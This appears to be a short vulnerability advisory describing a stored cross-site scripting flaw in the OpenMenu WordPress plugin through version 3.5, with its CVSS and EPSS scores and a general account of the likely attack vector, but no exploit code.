The OpenMenu plugin for WordPress suffers from an improper neutralization of input during web page generation that allows a stored cross‑site scripting vulnerability. Malicious users can embed attacker‑controlled scripts in data that the plugin stores and later renders on the site, enabling the injection of code that runs in the context of any visitor who views the affected menu. This flaw is classified as CWE‑79 and can compromise confidential information, undermine data integrity, or facilitate defacement of the site if an attacker’s script is executed.

All releases of the OpenMenu WordPress plugin up to version 3.5 inclusive are affected. Site administrators using any of the 3.5 or earlier releases are vulnerable.

The CVSS score of 6.5 indicates a moderate severity risk. The EPSS value of less than 1 % suggests a low exploitation probability at present, and the vulnerability is not yet listed in CISA’s KEV catalog, however the attack vector is most likely through accessible input fields provided by the plugin that are stored and later included in the generated page. If an attacker can submit data—typically via a menu creation or editing interface—the malicious content will persist and be delivered to all users that view the menu. No public exploit is currently documented, but the combination of stored payloads and ubiquitous user interaction makes the scenario plausible.